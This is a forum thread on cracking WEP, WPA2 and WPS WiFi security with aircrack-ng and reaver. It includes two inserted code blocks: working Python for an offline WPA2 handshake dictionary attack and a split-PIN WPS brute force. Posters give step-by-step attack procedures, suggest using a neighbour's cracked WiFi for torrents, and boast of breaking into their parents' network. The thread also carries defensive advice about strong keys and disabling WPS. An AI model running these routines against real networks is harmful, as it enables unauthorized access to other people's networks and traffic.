This is why you should not use WEP

So I'm a little drunk and bored and I did this

http://i1222.photobucket.com/albums/dd500/MrPete1985/th_20121107_005819.jpg

if you look at the larger picture here

http://i1222.photobucket.com/albums/dd500/MrPete1985/20121107_005819.jpg

you can see I cracked a 128-bit WEP key about 2 minutes after I started capturing data, and I am a n00b at WiFi hacking. So if you are using WEP, change to WPA2, hide your SSID and disable WPS.

BTW, this is a spare router I have; it took longer to set up the router than it did to break into it.

Now off to bed, I hope I'm not too hung over tomorrow

Actually, both WPA and WPA2 are a piece of cake... it just takes slightly longer, but it's a matter of time before you get the password. Which just proves that the ISPs' six-strike rule is ridiculous, considering you can just crack your neighbor's WiFi and download all the torrents you want (not saying you should do this at all). If you REALLY want to be safe, Ethernet is the way to go.

I have cracked a WiFi network before, using WEP, the same way you did, but without a GUI. That said, I just wanted the WiFi; up until now all I've had were desktops, so it wasn't needed until now....

No.... WPA2 is very, very hard to crack. Unlike WEP it does not transmit IVs... you have to capture a handshake, which contains a salted hash of the password. You then have to brute force the hash or use a rainbow table; however, since the salt is the ESSID, most rainbow tables are useless unless the ESSID is "linksys" or something common. So, unless your victim uses a short password or a common dictionary word, you're left to brute forcing it.... which is very time consuming. To get it cracked within a reasonable time of a few days, you would need a very powerful GPU cracking rig (like 2 or 3 5890's).


If you say that that is insecure, you are basically saying everything that transmits a hash or ticket is insecure (Kerberos, MS-CHAP, SFTP, every website that saves a password, Tek Syndicate, Steam, etc.).

WPA/WPA2 is only a piece of cake if the user sets up a weak password. If it is 8 letters, then you can brute force it in about half an hour using a CUDA card, or if you have WPS running, Reaver can brute force the PIN in about 8 hours.

You can see that picture here: http://i1222.photobucket.com/albums/dd500/MrPete1985/20121025_213040.jpg

I look at security like this: you're not trying to keep people out, just make it so much of a pain in the ass that they will go bother someone else.

This is why my passwords are just random characters and numbers and very long. I just keep the key in my wallet.


IP whitelist... top security!!!!!

You bike?

Yup!

WPA2 security entirely depends on key choice - for all practical purposes strong keys are uncrackable:

PU5pYCQbyfiBnbR6Nog5 - 20 random letters/digits give ~119-bit strength - uncrackable

6351649fdb88c46c592731572e2ca41727356fd6c96d960c6c244d1a09cb1fe4 - 64 random hexadecimal digits give full 256-bit strength - uncrackable

Just a quick question, what is all of this being done with? Could someone explain briefly what the entire process of cracking a WPA/WPA2 key is?

I cracked a WEP access point in the original post; that is super easy. Just put your WiFi card into monitor mode, then fake an association to the access point, then capture IVs (I did this by spamming ARPs to the AP), and finally, when you have enough data, you crack it using aircrack.

Cracking WPA/WPA2 is harder. After your device is in monitor mode you start capturing data, then you de-authenticate a client that is on the AP to capture the handshake. Once you have the handshake you use a dictionary attack or brute force the key; if you have a program like pyrit that can take advantage of CUDA and OpenCL, then you can speed up cracking WPA.

You can also brute force a WPS PIN to obtain the WPA key. This is done with a tool called reaver; it took about 7 hours when I did it, but you are only brute forcing an 8-digit number, so it takes far less time than brute forcing a WPA key. Once you have the PIN you get the password and the ESSID.

On some routers WPS is always running, but on some you need to press a button on the router to turn on WPS for device linking, and some routers will lock you out after too many wrong PINs.
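The WPA2-PSK cracking loop described in the post above (and the "salted hash, salt is the ESSID" point made earlier in the thread) in working code, as an added example that is not from the thread or from aircrack-ng/pyrit. Everything here is constructed: the SSID, the MAC addresses, the nonces and the wordlist are made up, and the EAPOL-Key frame layout is a simplified stand-in for a real message 2 (no RSN IE in the key data). What is real is the maths: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds), PTK via the 802.11i PRF, and the HMAC-SHA1 MIC over the EAPOL frame that a captured handshake lets you check offline.

```python
import hashlib
import hmac

# Constructed sample handshake parameters (not captured from the router in the
# thread): SSID, the two MAC addresses and the two 32-byte nonces that airodump
# would hand you from a real 4-way handshake.
SSID = "HomeNet"
AP_MAC = bytes.fromhex("00259c1a2b3c")
CLIENT_MAC = bytes.fromhex("d8f3b2445566")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32 bytes).
    The SSID is the salt, which is why a precomputed table only works for one SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11i PRF-512 (HMAC-SHA1). The first 16 bytes of the PTK are the KCK,
    the key that authenticates the EAPOL-Key frames of the handshake."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/AES-CCMP): MIC = HMAC-SHA1(KCK, frame)[:16],
    computed over the EAPOL-Key frame with its MIC field zeroed."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes) -> bytes:
    """A minimal EAPOL-Key message 2 body with the MIC field already zeroed
    (simplified layout constructed for this example; real frames carry RSN IE data)."""
    key_info = b"\x01\x0a"          # pairwise, MIC bit set, descriptor version 2
    replay_counter = (1).to_bytes(8, "big")
    body = b"\x02" + key_info + b"\x00\x10" + replay_counter + snonce
    body += bytes(16) + bytes(8) + bytes(8)   # key IV, key RSC, key ID
    body += bytes(16)                          # MIC field, zeroed before hashing
    body += b"\x00\x00"                        # key data length = 0
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def make_capture(true_passphrase: str) -> dict:
    """Stand-in for a .cap file: everything the attacker can read off the air,
    including the MIC the client computed with the real key."""
    frame = build_msg2(SNONCE)
    pmk = pmk_from_passphrase(true_passphrase, SSID)
    kck = ptk_from_pmk(pmk, AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    return {"ssid": SSID, "ap": AP_MAC, "client": CLIENT_MAC, "anonce": ANONCE,
            "snonce": SNONCE, "eapol": frame, "mic": eapol_mic(kck, frame)}


def crack(capture: dict, wordlist):
    """Offline dictionary attack, the same loop aircrack-ng/pyrit run: one PBKDF2
    (4096 HMAC-SHA1 rounds) per candidate, then a cheap PRF + MIC comparison.
    Returns the matching passphrase or None."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        kck = ptk_from_pmk(pmk, capture["ap"], capture["client"],
                           capture["anonce"], capture["snonce"])[:16]
        if eapol_mic(kck, capture["eapol"]) == capture["mic"]:
            return candidate
    return None


if __name__ == "__main__":
    # Constructed wordlist; the real passphrase is in it, as it would be for a weak key.
    capture = make_capture("Sup3rSecret!1")
    print(crack(capture, ["password", "linksys", "12345678", "Sup3rSecret!1"]))
```

Two things the code makes concrete: every candidate costs 4096 HMAC-SHA1 rounds before the cheap MIC check, which is the whole reason GPU rigs matter and why the 20-character random keys quoted above are out of reach; and the SSID is baked into the PBKDF2 salt, so a table of PMKs precomputed for "linksys" says nothing about "HomeNet". The WPA1 (TKIP) variant differs only in the MIC, which uses HMAC-MD5 instead of HMAC-SHA1.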

With WPS you're not brute forcing the entire 8-digit PIN as a whole; if that were the case the attack would require 7 years, not 7 hours. There is a critical fuckup in the WPS specification: the 8-digit PIN is split into two 4-digit parts, with each tested and reported as valid/invalid separately. Only 10000 combinations are required to crack WPS. It almost looks like WPS was designed to be easily crackable.
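The split-PIN weakness described above, as an added example that is not from the thread and is not reaver's code. The registrar (AP) side is modelled as a constructed oracle that answers the way a real WPS exchange leaks the result: a NACK after M4 means the first four digits were wrong, a NACK after M6 means the last four were. The eighth digit of a WPS PIN is a checksum of the first seven (that algorithm is the one from the WPS spec; the example's `wps_checksum` implements it), so the second phase has 1000 candidates, not 10000, and the worst case is 10000 + 1000 = 11000 attempts against about 10^7 valid PINs.

```python
class WpsRegistrarOracle:
    """Models the AP/registrar as the attacker sees it (constructed for this example).
    A real registrar sends EAP-NACK right after M4 when PSK1 (first half of the PIN)
    is wrong, and after M6 when PSK2 (second half) is wrong, which leaks the halves
    independently. attempts counts protocol runs, i.e. what a lockout would see."""

    def __init__(self, pin: str):
        if not is_valid_pin(pin):
            raise ValueError("registrar PIN must be 8 digits with a valid checksum")
        self.first, self.second = pin[:4], pin[4:]
        self.attempts = 0

    def try_pin(self, pin: str) -> str:
        self.attempts += 1
        if pin[:4] != self.first:
            return "NACK after M4"      # PSK1 wrong: first half rejected
        if pin[4:] != self.second:
            return "NACK after M6"      # PSK2 wrong: second half rejected
        return "M7: credentials (WPA PSK + ESSID) delivered"


def wps_checksum(pin7: int) -> int:
    """Checksum digit for a 7-digit WPS PIN (WPS spec algorithm)."""
    accum = 0
    while pin7:
        accum += 3 * (pin7 % 10)
        pin7 //= 10
        accum += pin7 % 10
        pin7 //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


def brute_force_wps(oracle: WpsRegistrarOracle):
    """The reaver-style attack: fix the first half, then the second.
    Returns the recovered PIN, or None if the oracle never accepts one."""
    # Phase 1: up to 10^4 guesses for the first half; the second half is junk here,
    # but the checksum digit is kept valid so nothing is rejected for a bad format.
    first = None
    for h in range(10000):
        cand = f"{h:04d}000"
        cand += str(wps_checksum(int(cand)))
        if oracle.try_pin(cand) != "NACK after M4":
            first = f"{h:04d}"
            break
    if first is None:
        return None
    # Phase 2: up to 10^3 guesses for digits 5-7; digit 8 is computed, not guessed.
    for s in range(1000):
        cand = first + f"{s:03d}"
        cand += str(wps_checksum(int(cand)))
        if oracle.try_pin(cand).startswith("M7"):
            return cand
    return None


if __name__ == "__main__":
    # Constructed target: 12345670 is a syntactically valid PIN (checksum digit 0).
    ap = WpsRegistrarOracle("12345670")
    print(brute_force_wps(ap), "after", ap.attempts, "attempts")
```

With the target PIN 12345670 the oracle accepts after 1803 attempts (1235 for the first half, 568 for the second); a PIN beginning 9999 with the worst second half still falls in 11000. A registrar that locked after a handful of M4 failures, as some of the routers mentioned above do, is the only thing that stops this, since the protocol itself hands over the result one half at a time.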

Lol, I cracked my parents' internet password after they took the internet away from me. They never found out until they decided I could have internet again.

What's the program called?

It's a Linux-based OS called BackTrack.

http://www.backtrack-linux.org/

BackTrack Linux is the OS I used, and aircrack-ng is the software suite I used on the WEP connection. For the WPS shot I posted I used reaver; reaver also comes with a tool called wash that will show you any access points that are vulnerable to reaver.

My password is GOD

If the password is written down anywhere it instantly becomes less secure than any level of random characters. As long as you don't use only actual words, a statement you remember is just as secure to a computer as any amount of random characters. Though all of this only prevents brute force attacks.

This is all being done with pen tools. Well, assuming these guys are taking advantage of the modern GUIs available today.

As the very first post in the thread shows, BackTrack 5, though I'd argue 4 worked a bit better for me. There are a few distros. Just search for pen testing distros.